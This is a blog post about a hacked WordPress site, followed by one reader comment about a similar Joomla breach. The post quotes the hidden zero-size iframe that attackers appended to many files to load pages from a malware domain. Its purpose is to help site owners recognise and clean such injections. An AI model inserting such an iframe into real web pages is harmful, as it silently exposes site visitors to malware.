WordPress Parse error: syntax error, unexpected ‘<' in index.php on line 5

My mother’s blog — Adventures in Parenting.org — was hacked today. It took a couple hours to do the research and fix the site, but I think things have mostly settled down now. Unfortunately, it’s impossible to know — without re-doing the entire site — that everything is completely clean. So comb through the site, and let me know right away if you see anything suspicious.

The point of the attack was adding the following code to the bottom of many files:

<iframe src=”http:// google-analyze.org /lib/index.php” width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

google-analyze.org is a malware site. Don’t go there.

Fortunately (or not), the hacker or worm also added that bit of code to the bottom of the root index.php, which didn’t have a closing PHP tag (?>). That means the parse error (which is this post’s title) was showing up instead of the site. This was both a good and bad thing.

It was a bad thing because it caused the site to become inaccessible.

It was a good thing because it signaled to my mother that the site had a problem.

This was a mistake on the hacker (or worm)’s part. They wanted the hack to be silent, so that they could sneakily infect site visitors with the malware from their site. If the hacker hadn’t made this mistake, we might not have realized the breach until a long time later.

Has your site ever been hacked? How did you deal with it?

2 Responses to “WordPress Parse error: syntax error, unexpected ‘<' in index.php on line 5”

  1. […] Go here to read the rest: WordPress Parse error: syntax error, unexpected ‘ […]

  2. May says:

    Our joomla site was hack a few days ago with similar error showing on the frontpage. The strange thing is that comparing the hacked index.php and the original doesn’t show any difference. I then replaced index.php with the original anyway. That fixed it! That’s a little creepy!

    I looked at the ftp log for that day. Someone downloaded our index.php and a few minutes later uploaded a bigger version of it, then logged out. That’s all he did. I just hope that whatever was in the uploaded version did not hide any little spy program in our site. We’ll keep a close eye on it.

Leave a Reply